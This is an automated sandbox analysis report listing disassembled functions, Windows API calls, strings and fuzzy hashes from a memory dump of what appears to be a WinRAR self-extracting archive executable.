                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: ItemText$Dialog
                                                    • String ID: RENAMEDLG
                                                    • API String ID: 1770891597-3299779563
                                                    • Opcode ID: 78691bb5986986e1fad7ee9e0b639972e60ad6be3bb22d1630eaa8e4794c8191
                                                    • Instruction ID: f2e528411abd1e2b3e8593656d3951f5635f610e8c61cee0b2dae6604748a801
                                                    • Opcode Fuzzy Hash: 78691bb5986986e1fad7ee9e0b639972e60ad6be3bb22d1630eaa8e4794c8191
                                                    • Instruction Fuzzy Hash: E9017932640118B7DA215F945C01FBB3B25EB4AB50F500036FA05BA1D0CB7AD866976D
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: _memset$H_prolog
                                                    • String ID: ;p
                                                    • API String ID: 3013590873-2290485912
                                                    • Opcode ID: 56f5045b953efce44012e87429a48b7a75cd4b5515e354ad5193a0fccdbc02f6
                                                    • Instruction ID: 6084a19cc8fdac2cea8eb5380dac8fcce9e222b4eeefd413346753ef4e8476ca
                                                    • Opcode Fuzzy Hash: 56f5045b953efce44012e87429a48b7a75cd4b5515e354ad5193a0fccdbc02f6
                                                    • Instruction Fuzzy Hash: 3901B9B0781750BAD220AB668C87FDFBAACDF86B08F00401FB659B61C1C7FC1540866E
                                                    APIs
                                                    • __getptd.LIBCMT ref: 0041D6AE
                                                      • Part of subcall function 0041E574: __getptd_noexit.LIBCMT ref: 0041E577
                                                      • Part of subcall function 0041E574: __amsg_exit.LIBCMT ref: 0041E584
                                                    • __getptd.LIBCMT ref: 0041D6BF
                                                    • __getptd.LIBCMT ref: 0041D6CD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: __getptd$__amsg_exit__getptd_noexit
                                                    • String ID: MOC$csm
                                                    • API String ID: 803148776-1389381023
                                                    • Opcode ID: ff76af2ab1f2bc655f60c8d28124db9f091a0a07b538bc98cf4441336e04e070
                                                    • Instruction ID: 4ed4d8d9f0948e0be74688b0f2660ef1f140c4f6cdc82f78e24e21987bad1007
                                                    • Opcode Fuzzy Hash: ff76af2ab1f2bc655f60c8d28124db9f091a0a07b538bc98cf4441336e04e070
                                                    • Instruction Fuzzy Hash: 87E04F79D101049FC710ABAAC046BA93796EB45318F5A05E7E80DCB322EB3CD8D0994F
                                                    APIs
                                                    • __getptd.LIBCMT ref: 00421773
                                                      • Part of subcall function 0041E574: __getptd_noexit.LIBCMT ref: 0041E577
                                                      • Part of subcall function 0041E574: __amsg_exit.LIBCMT ref: 0041E584
                                                    • __amsg_exit.LIBCMT ref: 00421793
                                                    • __lock.LIBCMT ref: 004217A3
                                                    • InterlockedDecrement.KERNEL32(?), ref: 004217C0
                                                    • InterlockedIncrement.KERNEL32(021F16B8), ref: 004217EB
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                    • String ID:
                                                    • API String ID: 4271482742-0
                                                    • Opcode ID: 1904c64c2f7eb9a1631b0ee597ecde1b4678e3411cd0d16de502b8f6a8bd21bc
                                                    • Instruction ID: 63fb1741bdd88e79933145aa06474b73bff8dbe6d40a874fa99982fb7391d8e1
                                                    • Opcode Fuzzy Hash: 1904c64c2f7eb9a1631b0ee597ecde1b4678e3411cd0d16de502b8f6a8bd21bc
                                                    • Instruction Fuzzy Hash: B3018E35F01625ABDB20AF66A40575A7770BF94764FD0012BE800A76A0CB3C6992CBDE
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 00411A0F
                                                    • _wcslen.LIBCMT ref: 00411A20
                                                    • _wcslen.LIBCMT ref: 00411A30
                                                    • _wcslen.LIBCMT ref: 00411A3E
                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,00000000,?,?,00000000,?,00409CE8,__rar_,00000000,00000006,00000000,?,?), ref: 00411A5B
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$CompareString
                                                    • String ID:
                                                    • API String ID: 3397213944-0
                                                    • Opcode ID: 0c79ced954745f2c5e0e0d879718ba40a26046ad7cbdf73da099a7014804b54d
                                                    • Instruction ID: a9558cc59323643d2d9cfd89e177e1ae6c05d6f9270a3c92a284dfa939f321ac
                                                    • Opcode Fuzzy Hash: 0c79ced954745f2c5e0e0d879718ba40a26046ad7cbdf73da099a7014804b54d
                                                    • Instruction Fuzzy Hash: B4F0B432249058BFDF126F92EC01DDE3F1ADF413B8F245027FE2589060D63588B29799
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00416330
                                                      • Part of subcall function 00412571: _realloc.LIBCMT ref: 004125C9
                                                      • Part of subcall function 0041A41A: _malloc.LIBCMT ref: 0041A434
                                                    • _memset.LIBCMT ref: 00416580
                                                    • _memset.LIBCMT ref: 0041673A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: _memset$H_prolog_malloc_realloc
                                                    • String ID:
                                                    • API String ID: 1826288403-3916222277
                                                    • Opcode ID: f9c8cb6b05ddb76e8548eeb2d1ac3ea54b8cf3ba8c174f49064645aa04d130e2
                                                    • Instruction ID: e6e62932246ad9cc85acb2fdef4fd174b94dd1b142c26c02803cf8505e01ba38
                                                    • Opcode Fuzzy Hash: f9c8cb6b05ddb76e8548eeb2d1ac3ea54b8cf3ba8c174f49064645aa04d130e2
                                                    • Instruction Fuzzy Hash: 95E1C271A00755AFDB10DF65C880BEEB7B1FF14308F15492EE826A7281DB79E891CB49
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy
                                                    • String ID: T
                                                    • API String ID: 3048848545-3187964512
                                                    • Opcode ID: ca89c477607d7b183aac38426e97101888d983e4494ee7729fb40aa10065e44c
                                                    • Instruction ID: 1a64791ecf6c394d75ade218f1bd7adc46ae4bf97b91eb71da31d361fe9c082b
                                                    • Opcode Fuzzy Hash: ca89c477607d7b183aac38426e97101888d983e4494ee7729fb40aa10065e44c
                                                    • Instruction Fuzzy Hash: 2A910C71600644AFDF24DF64C844BEAB7F8AF04314F14456FE99997282CB78A9C4CF65
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00406B0E
                                                    • _wcscpy.LIBCMT ref: 00406B44
                                                    • SetFileTime.KERNEL32(?,?,?,?,00000000,00000005,?,00000011,00000000,?,00000000,?,0000003A,00000802,?,00000000), ref: 00406C64
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: FileH_prologTime_wcscpy
                                                    • String ID: :
                                                    • API String ID: 26009825-336475711
                                                    • Opcode ID: 4237846a2648132caf2513631f94b8e86ff27be91d244c51fb8acdc38b2addb1
                                                    • Instruction ID: 5c255cd2950383439117d9559028b553a344d07193c18407302b7e13fe35cf44
                                                    • Opcode Fuzzy Hash: 4237846a2648132caf2513631f94b8e86ff27be91d244c51fb8acdc38b2addb1
                                                    • Instruction Fuzzy Hash: 0B41A571805118AAEB20EB61DC95EDE737CAF05348F0040AFB556B31C1DB786F89CE69
                                                    APIs
                                                    • EndDialog.USER32 ref: 0040D2AF
                                                    • GetDlgItemTextW.USER32(?,00000065,?,?), ref: 0040D2C4
                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 0040D2D9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: ItemText$Dialog
                                                    • String ID: ASKNEXTVOL
                                                    • API String ID: 1770891597-3402441367
                                                    • Opcode ID: 15e30dc99aad98673fcf82a25a8af69f2c98eca4f98acdabd84c1cc6367ce671
                                                    • Instruction ID: 01490f4368d8e2b0c51ca769b2cbfe42fa3a35388a386c9a7bbd6db21a0877e3
                                                    • Opcode Fuzzy Hash: 15e30dc99aad98673fcf82a25a8af69f2c98eca4f98acdabd84c1cc6367ce671
                                                    • Instruction Fuzzy Hash: 4E11AC35600108ABDA20AFE49C05F763B65EB0A714F40407AFA05BA1E0C77AD82AAB5D
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: Exception@8Throw_memset
                                                    • String ID:
                                                    • API String ID: 3963884845-3916222277
                                                    • Opcode ID: f1e0d126ccc598ec3a566041394e6bcb644098b0f51350aeff818ebd60a47f7b
                                                    • Instruction ID: 09102312ef323ca3808ce903e21c43e5cbc3ffe47ec5c8ccf28343ae0446d513
                                                    • Opcode Fuzzy Hash: f1e0d126ccc598ec3a566041394e6bcb644098b0f51350aeff818ebd60a47f7b
                                                    • Instruction Fuzzy Hash: 7F11D672E00118BACB14EFA9CE816DEBB75FF55344F20416BEA05F7241D6B86AD1C788
                                                    APIs
                                                    • EndDialog.USER32 ref: 0040D1AF
                                                    • GetDlgItemTextW.USER32(?,00000065,?,00000080), ref: 0040D1C7
                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0040D1F5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: ItemText$Dialog
                                                    • String ID: GETPASSWORD1
                                                    • API String ID: 1770891597-3292211884
                                                    • Opcode ID: 85215617ba6e155f844f3755616e20d1bd0654f90a138bb46272cc890f705dea
                                                    • Instruction ID: 8ab4af7042586728f975ac21911bc1a96d3ec999273aa8f9492a5ee4e386da3b
                                                    • Opcode Fuzzy Hash: 85215617ba6e155f844f3755616e20d1bd0654f90a138bb46272cc890f705dea
                                                    • Instruction Fuzzy Hash: 7C11C231900118BADB21AF95DD48EFB3A6CEF49754F400036F945BA0C0DA7C89569669
                                                    APIs
                                                    • InitializeCriticalSection.KERNEL32(000001A0,?,0044E590,?,00410CC6,00000020,?,00409689,?,?,?,0040B86F,?,?,00000000,?), ref: 00410B6F
                                                    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,00409689,?,?,?,0040B86F,?,?,00000000,?,?,00412073), ref: 00410B79
                                                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,00409689,?,?,?,0040B86F,?,?,00000000,?,?,00412073), ref: 00410B8B
                                                    Strings
                                                    • Thread pool initialization failed., xrefs: 00410BA3
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                    • String ID: Thread pool initialization failed.
                                                    • API String ID: 3340455307-2182114853
                                                    • Opcode ID: d27777b125d8c7c4ccedfcdf7d7a3ce84e9323dbb13909622413f97aff576ef9
                                                    • Instruction ID: 9f4177ae0e0da50f55a4e31e3315cc02682503906abf573712d3d7d038aac7b9
                                                    • Opcode Fuzzy Hash: d27777b125d8c7c4ccedfcdf7d7a3ce84e9323dbb13909622413f97aff576ef9
                                                    • Instruction Fuzzy Hash: F9115AB1600700AFD3305FA59895AE7BAE8FB54715F60483EF6DE86240D6B828C1CB18
                                                    APIs
                                                      • Part of subcall function 0040D740: _wcscpy.LIBCMT ref: 0040D745
                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\WinRAR SFX,00000000,00000001,?,?), ref: 0040D842
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0040D86F
                                                    • RegCloseKey.ADVAPI32(?), ref: 0040D8A8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: CloseOpenQueryValue_wcscpy
                                                    • String ID: Software\WinRAR SFX
                                                    • API String ID: 2005349754-754673328
                                                    • Opcode ID: 71ae37f9ecb2cb171e652d6c7bcee6a7bc9b58428e2d12d37b4f5fb14071ecdc
                                                    • Instruction ID: 66b38c0b4021eb7562e057afb35d4252b169828fd7ffb761761a5b99cfe8c373
                                                    • Opcode Fuzzy Hash: 71ae37f9ecb2cb171e652d6c7bcee6a7bc9b58428e2d12d37b4f5fb14071ecdc
                                                    • Instruction Fuzzy Hash: 73111835A00208EBEF22EF95DD45FDE7BB8EF04344F5080B6F904A2190D7789A95DB69
                                                    APIs
                                                    • SHGetMalloc.SHELL32(?), ref: 004050B1
                                                    • SHBrowseForFolderW.SHELL32(?), ref: 004050EC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: BrowseFolderMalloc
                                                    • String ID: A
                                                    • API String ID: 3812826013-3554254475
                                                    • Opcode ID: 2369a54d27e4e4691d9f9798ac45772536703bb9b1ea954af0e679125d43b3bb
                                                    • Instruction ID: 17e689514a80ddaa969dd399fe9822a7dfca4b0f81013ab3b9828cf4850fbc5f
                                                    • Opcode Fuzzy Hash: 2369a54d27e4e4691d9f9798ac45772536703bb9b1ea954af0e679125d43b3bb
                                                    • Instruction Fuzzy Hash: 5E012372900219EBCB10CFA4D809BEF7BF8EF49311F1044A6E801A7241D7388A058BA9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                    • API String ID: 0-56093855
                                                    • Opcode ID: e22283b9bc5e72540769d18aac47159cf207f53c44fde83f9b7c0921371c0d7c
                                                    • Instruction ID: e20b02ce912c7b05c98a4eec90f8a2d2a6e5d86961f098508cb58b84786bd088
                                                    • Opcode Fuzzy Hash: e22283b9bc5e72540769d18aac47159cf207f53c44fde83f9b7c0921371c0d7c
                                                    • Instruction Fuzzy Hash: 3601B575705200BFC711EF15EE40A167BD5E78A354F04483BFA01A22A0D3769835DBAE
                                                    APIs
                                                    • ___BuildCatchObject.LIBCMT ref: 0041DD05
                                                      • Part of subcall function 0041DC60: ___BuildCatchObjectHelper.LIBCMT ref: 0041DC96
                                                    • _UnwindNestedFrames.LIBCMT ref: 0041DD1C
                                                    • ___FrameUnwindToState.LIBCMT ref: 0041DD2A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                    • String ID: csm
                                                    • API String ID: 2163707966-1018135373
                                                    • Opcode ID: 80ea499b9455a035d0dddb51cdd3fe88855aa6b6e28e4107323293a3b82e8783
                                                    • Instruction ID: 522d405591d9047dc49bc1e409ebde333ba922c0dd474eac2d58a7e68e311ef8
                                                    • Opcode Fuzzy Hash: 80ea499b9455a035d0dddb51cdd3fe88855aa6b6e28e4107323293a3b82e8783
                                                    • Instruction Fuzzy Hash: 46014BB1800109BBCF126F52DD45EEB7F6AEF08354F104016FD1815122D73A99B1DBE8
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040BDF8
                                                    • FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 0040BE07
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: FindHandleModuleResource
                                                    • String ID: LTR$RTL
                                                    • API String ID: 3537982541-719208805
                                                    • Opcode ID: 4868ec0b688e46c80c0903c1a29f75735a1cefb7ec4e5993169b4a650a6cc8de
                                                    • Instruction ID: 34bbbea369ea378bc52fd115093618c86814130dcae86682adac18341ef0eddd
                                                    • Opcode Fuzzy Hash: 4868ec0b688e46c80c0903c1a29f75735a1cefb7ec4e5993169b4a650a6cc8de
                                                    • Instruction Fuzzy Hash: 09F0243134022037E62067759C0AFE73B6CEB81714F00047AB705E61C0CFA8D89A87EE
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(KERNEL32,0041D420), ref: 00423028
